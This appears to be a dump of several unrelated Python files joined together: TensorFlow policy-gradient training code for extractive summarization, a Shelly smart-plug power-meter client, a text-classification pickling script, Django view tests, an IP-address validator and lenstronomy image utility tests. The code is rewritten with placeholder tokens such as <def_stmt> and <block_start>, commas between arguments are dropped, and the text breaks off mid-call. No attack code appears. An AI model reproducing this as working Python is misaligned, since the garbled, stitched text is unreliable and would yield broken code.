tf.reshape(logits, [-1, FLAGS.target_label_size]) # [FLAGS.batch_size*FLAGS.max_doc_length, FLAGS.target_label_size] # # Get labels if predicted using these logits # logits_argmax = tf.argmax(logits, 1) # [FLAGS.batch_size*FLAGS.max_doc_length] # logits_argmax = tf.reshape(logits_argmax, [-1, FLAGS.max_doc_length]) # [FLAGS.batch_size, FLAGS.max_doc_length] # logits_argmax = tf.expand_dims(logits_argmax, 2) # [FLAGS.batch_size, FLAGS.max_doc_length, 1] # logits_argmin = tf.argmin(logits, 1) # [FLAGS.batch_size*FLAGS.max_doc_length] # logits_argmin = tf.reshape(logits_argmin, [-1, FLAGS.max_doc_length]) # [FLAGS.batch_size, FLAGS.max_doc_length] # logits_argmin = tf.expand_dims(logits_argmin, 2) # [FLAGS.batch_size, FLAGS.max_doc_length, 1] # # Convert argmin and argmax to labels, works only if FLAGS.target_label_size = 2 # labels = tf.concat(2, [logits_argmin, logits_argmax]) # [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size] # dtype = tf.float16 if FLAGS.use_fp16 else tf.float32 # labels = tf.cast(labels, dtype) # labels = tf.reshape(labels, [-1, FLAGS.target_label_size]) # [FLAGS.batch_size*FLAGS.max_doc_length, FLAGS.target_label_size] # # softmax_cross_entropy_with_logits # cross_entropy = tf.nn.softmax_cross_entropy_with_logits(logits, labels) # [FLAGS.batch_size*FLAGS.max_doc_length] # cross_entropy = tf.reshape(cross_entropy, [-1, FLAGS.max_doc_length]) # [FLAGS.batch_size, FLAGS.max_doc_length] # if FLAGS.weighted_loss: # cross_entropy = tf.mul(cross_entropy, weights) # return cross_entropy # def weighted_cross_entropy_loss(logits, future_rewards, actual_reward, weights): # """Optimizing expected reward: Weighted cross entropy # args: # logits: Logits without softmax. [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size] # future_rewards: [FLAGS.batch_size, FLAGS.max_doc_length] # actual_reward: [FLAGS.batch_size] # weights: Weights to avoid padded part [FLAGS.batch_size, FLAGS.max_doc_length] # """ # with tf.variable_scope('WeightedCrossEntropyLoss') as scope: # # Get Weights: External reward - Predicted reward # actual_reward = tf.reshape(tf.tile(actual_reward, [FLAGS.max_doc_length]),[-1, FLAGS.max_doc_length]) # [FLAGS.batch_size, FLAGS.max_doc_length] # diff_act_pred = future_rewards - actual_reward # actual_reward - future_rewards # [FLAGS.batch_size, FLAGS.max_doc_length] # # Reshape logits for argmax and argmin # logits = tf.reshape(logits, [-1, FLAGS.target_label_size]) # [FLAGS.batch_size*FLAGS.max_doc_length, FLAGS.target_label_size] # # Get labels if predicted using these logits # logits_argmax = tf.argmax(logits, 1) # [FLAGS.batch_size*FLAGS.max_doc_length] # logits_argmax = tf.reshape(logits_argmax, [-1, FLAGS.max_doc_length]) # [FLAGS.batch_size, FLAGS.max_doc_length] # logits_argmax = tf.expand_dims(logits_argmax, 2) # [FLAGS.batch_size, FLAGS.max_doc_length, 1] # logits_argmin = tf.argmin(logits, 1) # [FLAGS.batch_size*FLAGS.max_doc_length] # logits_argmin = tf.reshape(logits_argmin, [-1, FLAGS.max_doc_length]) # [FLAGS.batch_size, FLAGS.max_doc_length] # logits_argmin = tf.expand_dims(logits_argmin, 2) # [FLAGS.batch_size, FLAGS.max_doc_length, 1] # # Convert argmin and argmax to labels, works only if FLAGS.target_label_size = 2 # labels = tf.concat(2, [logits_argmin, logits_argmax]) # [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size] # dtype = tf.float16 if FLAGS.use_fp16 else tf.float32 # labels = tf.cast(labels, dtype) # labels = tf.reshape(labels, [-1, FLAGS.target_label_size]) # [FLAGS.batch_size*FLAGS.max_doc_length, FLAGS.target_label_size] # # softmax_cross_entropy_with_logits # cross_entropy = tf.nn.softmax_cross_entropy_with_logits(logits, labels) # [FLAGS.batch_size*FLAGS.max_doc_length] # cross_entropy = tf.reshape(cross_entropy, [-1, FLAGS.max_doc_length]) # [FLAGS.batch_size, FLAGS.max_doc_length] # if FLAGS.weighted_loss: # cross_entropy = tf.mul(cross_entropy, weights) # # Multiply with reward # cross_entropy = tf.mul(cross_entropy, diff_act_pred) # # Cross entroy / document # cross_entropy = tf.reduce_sum(cross_entropy, reduction_indices=1) # [FLAGS.batch_size] # cross_entropy_mean = tf.reduce_mean(cross_entropy, name='crossentropy') # tf.add_to_collection('reward_cross_entropy_loss', cross_entropy_mean) # # # # The total loss is defined as the cross entropy loss plus all of # # # # the weight decay terms (L2 loss). # # # return tf.add_n(tf.get_collection('losses'), name='total_loss') # return cross_entropy_mean ### Training functions <def_stmt>train_cross_entropy_loss cross_entropy_loss<block_start>""" Training with Gold Label: Pretraining network to start with a better policy Args: cross_entropy_loss """<with_stmt>tf.variable_scope('TrainCrossEntropyLoss')<as>scope<block_start>optimizer=tf.train.AdamOptimizer(learning_rate=FLAGS.learning_rate name='adam')<line_sep># Compute gradients of policy network policy_network_variables=tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES scope="PolicyNetwork")<line_sep># print(policy_network_variables) grads_and_vars=optimizer.compute_gradients(cross_entropy_loss var_list=policy_network_variables)<line_sep># print(grads_and_vars) # Apply Gradients <return>optimizer.apply_gradients(grads_and_vars)<block_end><block_end><def_stmt>train_meansq_loss futreward_meansq_loss<block_start>""" Training with Gold Label: Pretraining network to start with a better policy Args: futreward_meansq_loss """<with_stmt>tf.variable_scope('TrainMeanSqLoss')<as>scope<block_start>optimizer=tf.train.AdamOptimizer(learning_rate=FLAGS.learning_rate name='adam')<line_sep># Compute gradients of Future reward estimator futreward_estimator_variables=tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES scope="FutureRewardEstimator")<line_sep># print(futreward_estimator_variables) grads_and_vars=optimizer.compute_gradients(futreward_meansq_loss var_list=futreward_estimator_variables)<line_sep># print(grads_and_vars) # Apply Gradients <return>optimizer.apply_gradients(grads_and_vars)<block_end><block_end><def_stmt>train_neg_expectedreward reward_weighted_cross_entropy_loss_multisample<block_start>"""Training with Policy Gradient: Optimizing expected reward args: reward_weighted_cross_entropy_loss_multisample """<with_stmt>tf.variable_scope('TrainExpReward')<as>scope<block_start>optimizer=tf.train.AdamOptimizer(learning_rate=FLAGS.learning_rate name='adam')<line_sep># Compute gradients of policy network policy_network_variables=tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES scope="PolicyNetwork")<line_sep># print(policy_network_variables) # Compute gradients of policy network grads_and_vars=optimizer.compute_gradients(reward_weighted_cross_entropy_loss_multisample var_list=policy_network_variables)<line_sep># print(grads_and_vars) # Clip gradient: Pascanu et al. 2013, Exploding gradient problem grads_and_vars_capped_norm=[(tf.clip_by_norm(grad 5.0) var)<for>grad,var grads_and_vars]<line_sep># Apply Gradients # return optimizer.apply_gradients(grads_and_vars) <return>optimizer.apply_gradients(grads_and_vars_capped_norm)<block_end><block_end># def train_neg_expectedreward(reward_weighted_cross_entropy_loss): # """Training with Policy Gradient: Optimizing expected reward # args: # reward_weighted_cross_entropy_loss # """ # with tf.variable_scope('TrainExpReward') as scope: # optimizer = tf.train.AdamOptimizer(learning_rate=FLAGS.learning_rate, name='adam') # # Compute gradients of policy network # policy_network_variables = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope="PolicyNetwork") # # print(policy_network_variables) # # Compute gradients of policy network # grads_and_vars = optimizer.compute_gradients(reward_weighted_cross_entropy_loss, var_list=policy_network_variables) # # print(grads_and_vars) # # Clip gradient: Pascanu et al. 2013, Exploding gradient problem # grads_and_vars_capped_norm = [(tf.clip_by_norm(grad, 5.0), var) for grad, var in grads_and_vars] # # Apply Gradients # # return optimizer.apply_gradients(grads_and_vars) # return optimizer.apply_gradients(grads_and_vars_capped_norm) # def train_neg_expectedreward(logits, d_ltheta_ot): # """Training with Policy Gradient: Optimizing expected reward # args: # logits: Logits without softmax. [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size] # d_ltheta_ot: Placeholder [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size] # """ # with tf.variable_scope('TrainExpReward') as scope: # optimizer = tf.train.AdamOptimizer(learning_rate=FLAGS.learning_rate, name='adam') # # Modify logits with d_ltheta_ot # logits = tf.mul(logits, d_ltheta_ot) # # Compute gradients of policy network # policy_network_variables = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope="PolicyNetwork") # # print(policy_network_variables) # # Compute gradients of policy network # grads_and_vars = optimizer.compute_gradients(logits, var_list=policy_network_variables) # # print(grads_and_vars) # # Clip gradient: Pascanu et al. 2013, Exploding gradient problem # grads_and_vars_capped_norm = [(tf.clip_by_norm(grad, 5.0), var) for grad, var in grads_and_vars] # # Apply Gradients # # return optimizer.apply_gradients(grads_and_vars) # return optimizer.apply_gradients(grads_and_vars_capped_norm) # def temp_train_neg_expectedreward(logits, d_ltheta_ot): # with tf.variable_scope('TempTrainExpReward') as scope: # optimizer = tf.train.AdamOptimizer(learning_rate=FLAGS.learning_rate, name='adam') # # Modify logits with d_ltheta_ot # logits = tf.mul(logits, d_ltheta_ot) # # Compute gradients of policy network # policy_network_variables = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope="PolicyNetwork") # # print(policy_network_variables) # # Compute gradients of policy network # grads_and_vars = optimizer.compute_gradients(logits, var_list=policy_network_variables) # grads_and_vars_capped_norm = [(tf.clip_by_norm(grad, 5.0), var) for grad, var in grads_and_vars] # grads_and_vars_capped_val = [(tf.clip_by_value(grad, -1., 1.), var) for grad, var in grads_and_vars] # # tf.clip_by_norm(t, clip_norm, axes=None, name=None) # # https://www.tensorflow.org/versions/r0.11/api_docs/python/train/gradient_clipping # return grads_and_vars, grads_and_vars_capped_norm, grads_and_vars_capped_val ### Accuracy Calculations <def_stmt>accuracy logits labels weights<block_start>"""Estimate accuracy of predictions Args: logits: Logits from inference(). [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size] labels: Sentence extraction gold levels [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size] weights: Weights to avoid padded part [FLAGS.batch_size, FLAGS.max_doc_length] Returns: Accuracy: Estimates average of accuracy for each sentence """<with_stmt>tf.variable_scope('Accuracy')<as>scope<block_start>logits=tf.reshape(logits [-1 FLAGS.target_label_size])# [FLAGS.batch_size*FLAGS.max_doc_length, FLAGS.target_label_size] labels=tf.reshape(labels [-1 FLAGS.target_label_size])# [FLAGS.batch_size*FLAGS.max_doc_length, FLAGS.target_label_size] correct_pred=tf.equal(tf.argmax(logits 1) tf.argmax(labels 1))# [FLAGS.batch_size*FLAGS.max_doc_length] correct_pred=tf.reshape(correct_pred [-1 FLAGS.max_doc_length])# [FLAGS.batch_size, FLAGS.max_doc_length] correct_pred=tf.cast(correct_pred tf.float32)<line_sep># Get Accuracy accuracy=tf.reduce_mean(correct_pred name='accuracy')<if_stmt>FLAGS.weighted_loss<block_start>correct_pred=tf.mul(correct_pred weights)<line_sep>correct_pred=tf.reduce_sum(correct_pred reduction_indices=1)# [FLAGS.batch_size] doc_lengths=tf.reduce_sum(weights reduction_indices=1)# [FLAGS.batch_size] correct_pred_avg=tf.div(correct_pred doc_lengths)<line_sep>accuracy=tf.reduce_mean(correct_pred_avg name='accuracy')<block_end><block_end><return>accuracy<block_end># Improve it to show exact accuracy (top three ranked ones), not all.
<import_from_future_stmt> annotations<import_stmt>logging<import_stmt>requests<import_stmt>time<import_from_stmt>.errors ConnectionError<import_from_stmt>.powermeter PowerMeasurementResult PowerMeter<line_sep>_LOGGER=logging.getLogger("measure")<class_stmt>ShellyApi<block_start>status_endpoint="/status"<line_sep>meter_endpoint="/meter/0"<def_stmt>parse_json self json:str<arrow>tuple(float float)<block_start><pass><block_end><block_end><class_stmt>ShellyApiGen1(ShellyApi)<block_start>api_version=1<def_stmt>parse_json self json<arrow>tuple(float float)<block_start><return>(float(json["power"]) float(json["timestamp"]))<block_end><block_end><class_stmt>ShellyApiGen2(ShellyApi)<block_start>api_version=2<line_sep>status_endpoint="/rpc/Shelly.GetStatus"<line_sep>meter_endpoint="/rpc/Switch.GetStatus?id=0"<def_stmt>parse_json self json<arrow>tuple(float float)<block_start><return>(float(json["apower"]) time.time())<block_end><block_end><class_stmt>ShellyPowerMeter(PowerMeter)<block_start><def_stmt>__init__ self shelly_ip:str timeout:int=5<block_start>self.timeout=timeout<line_sep>self.ip_address=shelly_ip<line_sep>self.api=self.detect_api_type()<block_end><def_stmt>get_power self<arrow>PowerMeasurementResult<block_start>r=requests.get("http://{}{}".format(self.ip_address self.api.meter_endpoint) timeout=self.timeout)<line_sep>json=r.json()<line_sep>power=self.api.parse_json(json)<line_sep><return>PowerMeasurementResult(power[0] power[1])<block_end><def_stmt>detect_api_type self<arrow>ShellyApi<block_start><for_stmt>api (ShellyApiGen1() ShellyApiGen2())<block_start><try_stmt><block_start>uri="http://{}{}".format(self.ip_address api.status_endpoint)<line_sep>_LOGGER.debug(f"Checking API connection: {uri}")<line_sep>response=requests.get(uri timeout=self.timeout)<block_end><except_stmt>requests.RequestException<block_start>_LOGGER.debug("Connection could not be established")<line_sep><continue><block_end><if_stmt>response.status_code<ne>200<block_start>_LOGGER.debug(f"Unexpected status code {response.status_code}")<line_sep><continue><block_end>_LOGGER.debug(f"Shelly API version {api.api_version} detected")<line_sep><return>api<block_end><raise>ConnectionError("Could not connect to Shelly Plug")<block_end><block_end>
# Text Classifiation using NLP # Importing the libraries <import_stmt>numpy<as>np<import_stmt>re<import_stmt>pickle<import_stmt>nltk<import_from_stmt>nltk.corpus stopwords<import_from_stmt>sklearn.datasets load_files<line_sep>nltk.download('stopwords')<line_sep># Importing the dataset reviews=load_files('txt_sentoken/')<line_sep>X,y=reviews.data reviews.target<line_sep># Pickling the dataset <with_stmt>open('X.pickle' 'wb')<as>f<block_start>pickle.dump(X f)<block_end><with_stmt>open('y.pickle' 'wb')<as>f<block_start>pickle.dump(y f)<block_end># Unpickling dataset X_in=open('X.pickle' 'rb')<line_sep>y_in=open('y.pickle' 'rb')<line_sep>X=pickle.load(X_in)<line_sep>y=pickle.load(y_in)<line_sep>
<import_from_stmt>django.test TestCase Client<import_from_stmt>django.contrib.auth.models User<import_from_stmt>.models Feed<class_stmt>FeedViewsTest(TestCase)<block_start><def_stmt>setUp self<block_start>self.client=Client()<line_sep>user=User.objects.create_user(username='test_user' email='<EMAIL>' password='<PASSWORD>')<line_sep>self.feed=Feed.objects.create(user=user post='test feed')<block_end><def_stmt>test_feeds self<block_start>response=self.client.get('/feeds/')<line_sep>self.assertEqual(response.status_code 200)<block_end><def_stmt>test_feed self<block_start>response=self.client.get('/feeds/123/')<line_sep>self.assertEqual(response.status_code 404)<line_sep>response=self.client.get(f'/feeds/{self.feed.pk}/')<line_sep>self.assertEqual(response.status_code 200)<block_end><block_end>
# Time: O(1) # Space: O(1) <import_stmt>string<class_stmt>Solution(object)<block_start><def_stmt>validIPAddress self IP<block_start>""" :type IP: str :rtype: str """<line_sep>blocks=IP.split('.')<if_stmt>len(blocks)<eq>4<block_start><for_stmt>i xrange(len(blocks))<block_start><if_stmt><not>blocks[i].isdigit()<or><not>0<le>int(blocks[i])<l>256<or>(blocks[i][0]<eq>'0'<and>len(blocks[i])<g>1)<block_start><return>"Neither"<block_end><block_end><return>"IPv4"<block_end>blocks=IP.split(':')<if_stmt>len(blocks)<eq>8<block_start><for_stmt>i xrange(len(blocks))<block_start><if_stmt><not>(1<le>len(blocks[i])<le>4)<or><not>all(c<in>string.hexdigits<for>c blocks[i])<block_start><return>"Neither"<block_end><block_end><return>"IPv6"<block_end><return>"Neither"<block_end><block_end>
__author__='sibirrer'<import_stmt>lenstronomy.Util.util<as>util<import_stmt>pytest<import_stmt>unittest<import_stmt>numpy<as>np<import_stmt>numpy.testing<as>npt<import_stmt>lenstronomy.Util.image_util<as>image_util<def_stmt>test_add_layer2image_odd_odd <block_start>grid2d=np.zeros((101 101))<line_sep>kernel=np.zeros((21 21))<line_sep>kernel[10 10]=1<line_sep>x_pos=50<line_sep>y_pos=50<line_sep>added=image_util.add_layer2image(grid2d x_pos y_pos kernel order=0)<assert_stmt>added[50 50]<eq>1<assert_stmt>added[49 49]<eq>0<line_sep>x_pos=70<line_sep>y_pos=95<line_sep>added=image_util.add_layer2image(grid2d x_pos y_pos kernel order=0)<assert_stmt>added[95 70]<eq>1<line_sep>x_pos=20<line_sep>y_pos=45<line_sep>added=image_util.add_layer2image(grid2d x_pos y_pos kernel order=0)<assert_stmt>added[45 20]<eq>1<line_sep>x_pos=45<line_sep>y_pos=20<line_sep>added=image_util.add_layer2image(grid2d x_pos y_pos kernel order=0)<assert_stmt>added[20 45]<eq>1<line_sep>x_pos=20<line_sep>y_pos=55<line_sep>added=image_util.add_layer2image(grid2d x_pos y_pos kernel order=0)<assert_stmt>added[55 20]<eq>1<line_sep>x_pos=20<line_sep>y_pos=100<line_sep>added=image_util.add_layer2image(grid2d x_pos y_pos kernel order=0)<assert_stmt>added[100 20]<eq>1<line_sep>x_pos=20.5<line_sep>y_pos=100<line_sep>added=image_util.add_layer2image(grid2d x_pos y_pos kernel order=1)<assert_stmt>added[100 20]<eq>0.5<assert_stmt>added[100 21]<eq>0.5<block_end><def_stmt>test_add_layer2image_int <block_start>grid2d=np.zeros((7 7))<line_sep>x_pos,y_pos=4 1<line_sep>kernel=np.ones((3 3))<line_sep>added=image_util.add_layer2image_int(grid2d x_pos y_pos kernel)<line_sep>print(added)<assert_stmt>added[0 0]<eq>0<assert_stmt>added[0 3]<eq>1<line_sep>added=image_util.add_layer2image_int(grid2d x_pos+10 y_pos kernel)<line_sep>print(added)<line_sep>npt.assert_almost_equal(grid2d added decimal=9)<block_end><def_stmt>test_add_background <block_start>image=np.ones((10 10))<line_sep>sigma_bkgd=1.<line_sep>image_noisy=image_util.add_background(image sigma_bkgd)<assert_stmt>abs(np.sum(image_noisy))<l>np.sqrt(np.sum(image)<times>sigma_bkgd)<times>3<block_end><def_stmt>test_add_poisson <block_start>image=np.ones((100 100))<line_sep>exp_time=100.<line_sep>poisson=image_util.add_poisson(image exp_time)<assert_stmt>abs(np.sum(poisson))<l>np.sqrt(np.sum(image)/exp_time)<times>10<block_end><def_stmt>test_findOverlap <block_start>x_mins=[0 1 0]<line_sep>y_mins=[1 2 1]<line_sep>deltapix=0.5<line_sep>x_mins,y_mins=image_util.findOverlap(x_mins y_mins deltapix)<line_sep>print(x_mins y_mins)<assert_stmt>x_mins[0]<eq>0<assert_stmt>y_mins[0]<eq>1<assert_stmt>len(x_mins)<eq>2<block_end><def_stmt>test_coordInImage <block_start>x_coord=[100 20 -10]<line_sep>y_coord=[0 -30 5]<line_sep>numPix=50<line_sep>deltapix=1<line_sep>x_result,y_result=image_util.coordInImage(x_coord y_coord numPix deltapix)<assert_stmt>x_result<eq>-10<assert_stmt>y_result<eq>5<block_end><def_stmt>test_rebin_coord_transform <block_start>x_grid,y_grid,ra_at_xy_0,dec_at_xy_0,x_at_radec_0,y_at_radec_0,Mpix2coord,Mcoord2pix=util.make_grid_with_coordtransform(numPix=3 deltapix=0.03 subgrid_res=1)<line_sep>x_grid,y_grid,ra_at_xy_0_re,dec_at_xy_0_re,x_at_radec_0_re,y_at_radec_0_re,Mpix2coord_re,Mcoord2pix_re=util.make_grid_with_coordtransform(numPix=1 deltapix=0.09 subgrid_res=1)<line_sep>ra_at_xy_0_resized,dec_at_xy_0_resized,x_at_radec_0_resized,y_at_radec_0_resized,Mpix2coord_resized,Mcoord2pix_resized=image_util.rebin_coord_transform(3 x_at_radec_0 y_at_radec_0 Mpix2coord Mcoord2pix)<assert_stmt>ra_at_xy_0_resized<eq>ra_at_xy_0_re<assert_stmt>dec_at_xy_0_resized<eq>dec_at_xy_0_re<assert_stmt>x_at_radec_0_resized<eq>x_at_radec_0_re<assert_stmt>y_at_radec_0_resized<eq>y_at_radec_0_re<line_sep>npt.assert_almost_equal(Mcoord2pix_resized[0][0] Mcoord2pix_re[0][0] decimal=8)<line_sep>npt.assert_almost_equal(Mpix2coord_re[0][0] Mpix2coord_resized[0][0] decimal=8)<line_sep>x_grid,y_grid,ra_at_xy_0,dec_at_xy_0,x_at_radec_0,y_at_radec_0,Mpix2coord,Mcoord2pix=util.make_grid_with_coordtransform(numPix=100 deltapix=0.05 subgrid_res=1)<line_sep>x_grid,y_grid,ra_at_xy_0_re,dec_at_xy_0_re,x_at_radec_0_re,y_at_radec_0_re,Mpix2coord_re,Mcoord2pix_re=util.make_grid_with_coordtransform(numPix=50 deltapix=0.1 subgrid_res=1)<line_sep>ra_at_xy_0_resized,dec_at_xy_0_resized,x_at_radec_0_resized,y_at_radec_0_resized,Mpix2coord_resized,Mcoord2pix_resized=image_util.rebin_coord_transform(2 x_at_radec_0 y_at_radec_0 Mpix2coord Mcoord2pix)<assert_stmt>ra_at_xy_0_resized<eq>ra_at_xy_0_re<assert_stmt>dec_at_xy_0_resized<eq>dec_at_xy_0_re<assert_stmt>x_at_radec_0_resized<eq>x_at_radec_0_re<assert_stmt>y_at_radec_0_resized<eq>y_at_radec_0_re<line_sep>npt.assert_almost_equal(Mcoord2pix_resized[0][0] Mcoord2pix_re[0][0] decimal=8)<line_sep>npt.assert_almost_equal(Mpix2coord_re[0][0] Mpix2coord_resized[0][0] decimal=8)<line_sep>x_grid,y_grid,ra_at_xy_0,dec_at_xy_0,x_at_radec_0,y_at_radec_0,Mpix2coord,Mcoord2pix=util.make_grid_with_coordtransform(numPix=99 deltapix=0.1 subgrid_res=1)<line_sep>x_grid,y_grid,ra_at_xy_0_re,dec_at_xy_0_re,x_at_radec_0_re,y_at_radec_0_re,Mpix2coord_re,Mcoord2pix_re=util.make_grid_with_coordtransform(numPix=33 deltapix=0.3 subgrid_res=1)<assert_stmt>x_at_radec_0<eq>49<line_sep>ra_at_xy_0_resized,dec_at_xy_0_resized,x_at_radec_0_resized,y_at_radec_0_resized,Mpix2coord_resized,Mcoord2pix_resized=image_util.rebin_coord_transform(3 x_at_radec_0 y_at_radec_0 Mpix2coord Mcoord2pix)<assert_stmt>x_at_radec_0_resized<eq>16<line_sep>npt.assert_almost_equal(ra_at_xy_0_resized ra_at_xy_0_re decimal=8)<line_sep>npt.assert_almost_equal(dec_at_xy_0_resized dec_at_xy_0_re decimal=8)<line_sep>npt.assert_almost_equal(x_at_radec_0_resized x_at_radec_0_re decimal=8)<line_sep>npt.assert_almost_equal(y_at_radec_0_resized y_at_radec_0_re decimal=8)<line_sep>npt.assert_almost_equal(Mcoord2pix_resized[0][0] Mcoord2pix_re[0][0] decimal=8)<line_sep>npt.assert_almost_equal(Mpix2coord_re[0][0] Mpix2coord_resized[0][0] decimal=8)<line_sep>x_in,y_in=10. 10.<line_sep>ra,dec=util.map_coord2pix(x_in y_in ra_at_xy_0 dec_at_xy_0 Mpix2coord)<line_sep>x_out,y_out=util.map_coord2pix(ra dec x_at_radec_0 y_at_radec_0 Mcoord2pix)<assert_stmt>x_in<eq>x_out<assert_stmt>y_in<eq>y_out<line_sep>x_in,y_in=10. 10.<line_sep>ra,dec=util.map_coord2pix(x_in y_in ra_at_xy_0_resized dec_at_xy_0_resized Mpix2coord_resized)<line_sep>x_out,y_out=util.map_coord2pix(ra dec x_at_radec_0_resized y_at_radec_0_resized Mcoord2pix_resized)<assert_stmt>x_in<eq>x_out<assert_stmt>y_in<eq>y_out<block_end><def_stmt>test_rotateImage <block_start>img=np.zeros((5 5))<line_sep>img[2 2]=1<line_sep>img[1 2]=0.5<line_sep>angle=360<line_sep>im_rot=image_util.rotateImage(img angle)<line_sep>npt.assert_almost_equal(im_rot[1 2] 0.5 decimal=10)<line_sep>npt.assert_almost_equal(im_rot[2 2] 1. decimal=10)<line_sep>npt.assert_almost_equal(im_rot[2 1] 0. decimal=10)<line_sep>angle=360./2<line_sep>im_rot=image_util.rotateImage(img angle)<line_sep>npt.assert_almost_equal(im_rot[1 2] 0. decimal=10)<line_sep>npt.assert_almost_equal(im_rot[2 2] 1. decimal=10)<line_sep>npt.assert_almost_equal(im_rot[3 2] 0.5 decimal=10)<line_sep>angle=360./4<line_sep>im_rot=image_util.rotateImage(img angle)<line_sep>npt.assert_almost_equal(im_rot[1 2] 0. decimal=10)<line_sep>npt.assert_almost_equal(im_rot[2 2] 1. decimal=10)<line_sep>npt.assert_almost_equal(im_rot[2 1] 0.5 decimal=10)<line_sep>angle=360./8<line_sep>im_rot=image_util.rotateImage(img angle)<line_sep>npt.assert_almost_equal(im_rot[1 2] 0.23931518624017051 decimal=10)<line_sep>npt.assert_almost_equal(im_rot[2 2] 1. decimal=10)<line_sep>npt.assert_almost_equal(im_rot[2 1] 0.23931518624017073 decimal=10)<block_end><def_stmt>test_re_size_array <block_start>numPix=9<line_sep>kernel=np.zeros((numPix numPix))<line_sep>kernel[int((numPix-1)/2) int((numPix-1)/2)]=1<line_sep>subgrid_res=2<line_sep>input_values=kernel<line_sep>x_in=np.linspace(0 1 numPix)<line_sep>x_out=np.linspace(0 1 numPix<times>subgrid_res)<line_sep>out_values=image_util.re_size_array(x_in x_in input_values x_out x_out)<line_sep>kernel_out=out_values<assert_stmt>kernel_out[int((numPix<times>subgrid_res-1)/2) int((numPix<times>subgrid_res-1)/2)]<eq>0.58477508650519028<block_end><def_stmt>test_symmetry_average <block_start>image=np.zeros((5 5))<line_sep>image[2 3]=1<line_sep>symmetry=2<line_sep>img_sym=image_util.symmetry_average(image symmetry)<line_sep>npt.assert_almost_equal(img_sym[2 1] 0.5 decimal=10)<block_end><def_stmt>test_cut_edges <block_start>image=np.zeros((51 51))<line_sep>image[25][25]=1<line_sep>numPix=21<line_sep>resized=image_util.cut_edges(image numPix)<line_sep>nx,ny=resized.shape<assert_stmt>nx<eq>numPix<assert_stmt>ny<eq>numPix<assert_stmt>resized[10][10]<eq>1<line_sep>image=np.zeros((5 5))<line_sep>image[2 2]=1<line_sep>numPix=3<line_sep>image_cut=image_util.cut_edges(image numPix)<assert_stmt>len(image_cut)<eq>numPix<assert_stmt>image_cut[1 1]<eq>1<line_sep>image=np.zeros((6 6))<line_sep>image[3 2]=1<line_sep>numPix=4<line_sep>image_cut=image_util.cut_edges(image numPix)<assert_stmt>len(image_cut)<eq>numPix<assert_stmt>image_cut[2 1]<eq>1<line_sep>image=np.zeros((6 8))<line_sep>image[3 2]=1<line_sep>numPix=4<line_sep>image_cut=image_util.cut_edges(image numPix)<assert_stmt>len(image_cut)<eq>numPix<assert_stmt>image_cut[2 0]<eq>1<block_end><def_stmt>test_re_size <block_start>grid=np.zeros((200 100))<line_sep>grid[100 50]=4<line_sep>grid_small=image_util.re_size(grid factor=2)<assert_stmt>grid_small[50][25]<eq>1<line_sep>grid_same=image_util.re_size(grid factor=1)<line_sep>npt.assert_equal(grid_same grid)<block_end><def_stmt>test_stack_images <block_start>numPix=10<line_sep>image1=np.ones((numPix numPix))<line_sep>image2=np.ones((numPix numPix))/10.<line_sep>image_list=[image1 image2]<line_sep>wht1=np.ones((numPix numPix))<line_sep>wht2=np.ones((numPix numPix))<times>10<line_sep>wht_list=[wht1 wht2]<line_sep>sigma_list=[0.1 0.2]<line_sep>image_stacked,wht_stacked,sigma_stacked=image_util.stack_images(image_list=image_list wht_list=wht_list sigma_list=sigma_list)<assert_stmt>sigma_stacked<eq>0.19306145983268458<assert_stmt>image_stacked[0 0]<eq>0.18181818181818182<assert_stmt>wht_stacked[0 0]<eq>5.5<block_end><def_stmt>test_rebin_image <block_start>numPix=10<line_sep>bin_size=2<line_sep>image=np.ones((numPix numPix))<line_sep>wht_map=np.ones((numPix numPix))<times>10<line_sep>idex_mask=np.ones((numPix numPix))<line_sep>sigma_bkg=0.1<line_sep>ra_coords,dec_coords=util.make_grid(numPix deltapix=0.05)<line_sep>ra_coords=util.array2image(ra_coords)<line_sep>dec_coords=util.array2image(dec_coords)<line_sep>image_resized,wht_map_resized,sigma_bkg_resized,ra_coords_resized,dec_coords_resized,idex_mask_resized=image_util.rebin_image(bin_size image wht_map sigma_bkg ra_coords dec_coords idex_mask)<assert_stmt>image_resized[0 0]<eq>4<assert_stmt>wht_map_resized[0 0]<eq>wht_map[0 0]<assert_stmt>sigma_bkg_resized<eq>0.2<assert_stmt>ra_coords_resized[0 0]<eq>-0.2<line_sep>numPix=11<line_sep>bin_size=2<line_sep>image=np.ones((numPix numPix))<line_sep>wht_map=np.ones((numPix numPix))<times>10<line_sep>idex_mask=np.ones((numPix numPix))<line_sep>sigma_bkg=0.1<line_sep>ra_coords,dec_coords=util.make_grid(numPix deltapix=0.05)<line_sep>ra_coords=util.array2image(ra_coords)<line_sep>dec_coords=util.array2image(dec_coords)<line_sep>image_resized,wht_map_resized,sigma_bkg_resized,ra_coords_resized,dec_coords_resized,idex_mask_resized=image_util.rebin_image(bin_size image wht_map sigma_bkg ra_coords dec_coords idex_mask)<assert_stmt>image_resized[0 0]<eq>4<assert_stmt>wht_map_resized[0 0]<eq>wht_map[0 0]<assert_stmt>sigma_bkg_resized<eq>0.2<line_sep>npt.assert_almost_equal(ra_coords_resized[0 0] -0.225 decimal=8)<block_end><def_stmt>test_radial_profile <block_start><import_from_stmt>lenstronomy.LightModel.Profiles.gaussian Gaussian<line_sep>gauss=Gaussian()<line_sep>x,y=util.make_grid(11 1)<line_sep>flux=gauss.function(x y sigma=10 amp=1)<line_sep>data=util.array2image(flux)<line_sep>profile_r=image_util.radial_profile(data center=[5 5])<line_sep>profile_r_true=gauss.function(np.linspace(0 stop=7 num=8) 0 sigma=10 amp=1)<line_sep>npt.assert_almost_equal(profile_r profile_r_true decimal=3)<block_end><def_stmt>test_gradient_map <block_start>image=np.zeros((6 8))<line_sep>grad=image_util.gradient_map(image)<line_sep>npt.assert_almost_equal(grad image 